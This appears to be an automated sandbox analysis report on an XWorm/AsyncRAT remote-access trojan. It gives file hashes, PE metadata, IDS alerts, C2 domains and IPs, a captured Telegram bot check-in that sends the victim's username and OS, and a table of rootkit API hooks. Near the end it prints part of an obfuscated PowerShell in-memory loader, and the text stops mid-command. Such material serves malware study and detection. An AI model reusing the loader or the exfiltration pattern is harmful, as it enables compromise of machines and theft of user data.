                                                      SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.350713761374238
                                                      Encrypted:false
                                                      SSDEEP:384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwC:dOqabeGTnbuSxG
                                                      MD5:DDDB6B698BA6FB2ED57468252FC7222B
                                                      SHA1:C3D474F743E406CA375D82D76768F504CF3E09D5
                                                      SHA-256:F21FA2154EB72500790F1F59FEBB757961562D232F206E2F332C4BBBD86D209F
                                                      SHA-512:E97150811CFDF061B2B07CC140D7B08D5B9F11E11AC199029B0A83497EACBA5A78C4B4405F46CB72B9546CA9A7BE1B93CE0BF0B3DF396AD4CE38710EABE86B0D
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.421206160086997
                                                      Encrypted:false
                                                      SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                      MD5:67CAD90771EBC0BD20736201D89C1586
                                                      SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                      SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                      SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68120
                                                      Entropy (8bit):4.328728890970768
                                                      Encrypted:false
                                                      SSDEEP:384:ilFRslFRtoaonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+W:Wmza1ZGg6Ur6V8
                                                      MD5:8A8ECCD84253B2E181AE7082A9963F9C
                                                      SHA1:71969E1AFAB903CDA0A9B2BD1D207B27B9F798B4
                                                      SHA-256:1F4930DD01D4D397132DF6B3E522E4359FAFFC33813EBDA133D24A1AE2C79246
                                                      SHA-512:1E8BA76CFA92C70E88B154B4BFD49EF849CBAA0FE152F8A15593E45957E9B890BA91FE7A720912A5BD64CC97F7064810E2861F38D2E75300F42A6E8BF3860161
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):74928
                                                      Entropy (8bit):4.368406135879575
                                                      Encrypted:false
                                                      SSDEEP:384:kFRc1tFRc1iKcpIj5dK4hcZGDSND+z6q0Cq1oqQmRtRbR4HeJvGAgXZIpURCOLiU:yYtunLmLQXHmtpJnqiNHpzoQpm5C+
                                                      MD5:C9F435B94734254BE656386AB7DFBEBA
                                                      SHA1:FE90927BFD04C5433E6F63520E4E8DD70628AD1A
                                                      SHA-256:62E43AF089F6B706118188DFB2325CA3B9C467B7854AD51ECD5081EAA15954C8
                                                      SHA-512:FA9980A06C9021960495D6B5D82779D131828F3C5F0CAAABEFD8ED65827BC03CFA9DB13940775ABBA7E0480EB871B3729EA4A1AA45B06EBF9B3E507049E58013
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):115992
                                                      Entropy (8bit):3.8957449966307878
                                                      Encrypted:false
                                                      SSDEEP:1536:qx6Wl36WlE/s03xuY6WlYXx6Wl36WlE/s03xuY6WlYPU7h02/Xrkczn00B9g:o6Wl36Wlc6Wls6Wl36Wlc6Wlc
                                                      MD5:72D7944BD27F98D070F14BA2490892A0
                                                      SHA1:4D0AB46A4B7897151EE75378FA02BF1B9DA58207
                                                      SHA-256:CFCA10084ED5AF4CC9ED3335609D6DE6EBE1E77EFEB15A1EA936D029CB98F4EC
                                                      SHA-512:7AB2778BA54847D7C4553BCFE4EC5E9BF11E8B58347B846CC9E3239F1F8D13EF4DE6D7822AABA983FB01E6F76D2D92C2F8AA62058A62B342F4A33FF15FAC6286
                                                      Malicious:false
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):4.011952127732658
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:mIURiU8n2P.exe
                                                      File size:512'512 bytes
                                                      MD5:e1c82191b678cea8f3c996887ddc1232
                                                      SHA1:7946006ca278892817b7a778eea1e04f5b2f948c
                                                      SHA256:bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
                                                      SHA512:cb1499db7c1a7b3c4436d02a1218a055f9c04d7b4ae2ca01fd179a6bdb74c30c8cda1ffda8b61dcc3397b97351b77d683295cb46701a614cf7341906bd807804
                                                      SSDEEP:12288:kU43i+9MrOq5q7pN37VvbvH3pJJtlueGAmp8R6LqSY4JiFZlmM5Ki634:V4JZDhAWS2ZN
                                                      TLSH:5AB428243DFB501AB173EFA69BE8799ADA6FB3733B06641A109103474B13981DEC153E
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x47e6ae
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66E8A53F [Mon Sep 16 21:38:07 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7e654 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x4de | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x82000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7c6b4 | 0x7c800 | 79d8d818f8056dcb0c8d54db15f7c858 | False | 0.47457996046686746 | data | 4.010562426386997 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x80000 | 0x4de | 0x600 | d45abf76ae74238289ede96d0455e824 | False | 0.376953125 | data | 3.766931639111126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x82000 | 0xc | 0x200 | ff2fc218b8f6e1dd234f0dbec2c8f47f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x800a0 | 0x254 | data | | | 0.46476510067114096
RT_MANIFEST | 0x802f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T19:15:38.561396+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49738 | 147.185.221.21 | 28600 | TCP
2024-10-13T19:15:49.657430+0200 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP
TCP Packets: per-packet listing (timestamp, source/destination port, source/destination IP) omitted.
UDP Packets: per-packet listing (timestamp, source/destination port, source/destination IP) omitted.
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 19:15:03.624383926 CEST | 192.168.2.4 | 1.1.1.1 | 0x75ce | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:05.292115927 CEST | 192.168.2.4 | 1.1.1.1 | 0xec1c | Standard query (0) | subscribe-bond.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:27.289050102 CEST | 192.168.2.4 | 1.1.1.1 | 0xe5fa | Standard query (0) | subscribe-bond.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:48.189029932 CEST | 192.168.2.4 | 1.1.1.1 | 0xf6b0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:49.801489115 CEST | 192.168.2.4 | 1.1.1.1 | 0x94b0 | Standard query (0) | updates-full.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 19:15:03.632144928 CEST | 1.1.1.1 | 192.168.2.4 | 0x75ce | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:05.325293064 CEST | 1.1.1.1 | 192.168.2.4 | 0xec1c | No error (0) | subscribe-bond.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:27.301724911 CEST | 1.1.1.1 | 192.168.2.4 | 0xe5fa | No error (0) | subscribe-bond.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:48.196780920 CEST | 1.1.1.1 | 192.168.2.4 | 0xf6b0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 19:15:49.815073013 CEST | 1.1.1.1 | 192.168.2.4 | 0x94b0 | No error (0) | updates-full.gl.at.ply.gg | | 147.185.221.20 | A (IP address) | IN (0x0001) | false
                                                      • api.telegram.org
                                                      • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 5804 | C:\Users\Public\DeadROOTkit.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 19:15:03.650500059 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Oct 13, 2024 19:15:04.163295984 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 17:15:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | 5804 | C:\Users\Public\DeadROOTkit.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-13 17:15:49 UTC | 285 | OUT | GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-13 17:15:49 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Sun, 13 Oct 2024 17:15:49 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-13 17:15:49 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                      Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
ZwResumeThread | INLINE | explorer.exe, winlogon.exe
NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
NtResumeThread | INLINE | explorer.exe, winlogon.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                      Target ID:0
                                                      Start time:13:14:55
                                                      Start date:13/10/2024
                                                      Path:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\mIURiU8n2P.exe"
                                                      Imagebase:0x370000
                                                      File size:512'512 bytes
                                                      MD5 hash:E1C82191B678CEA8F3C996887DDC1232
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:13:14:58
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadXClient.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\DeadXClient.exe"
                                                      Imagebase:0x680000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 96%, ReversingLabs
                                                      • Detection: 71%, Virustotal
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadROOTkit.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\DeadROOTkit.exe"
                                                      Imagebase:0x1a0000
                                                      File size:43'520 bytes
                                                      MD5 hash:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 64%, Virustotal
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadCodeRootKit.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\DeadCodeRootKit.exe"
                                                      Imagebase:0xb00000
                                                      File size:155'136 bytes
                                                      MD5 hash:B8479A23C22CF6FC456E197939284069
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 92%, ReversingLabs
                                                      • Detection: 82%, Virustotal
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e
'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$zjaDRBJuPBhArz=$RJkdRlkUxkpOh.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SsrFUvzfWALaJuFfDwp=bubCglTffNzZ @([String])([IntPtr]);$tNZWRoZhdGxbOGCpZBOKKk=bubCglTffNzZ 
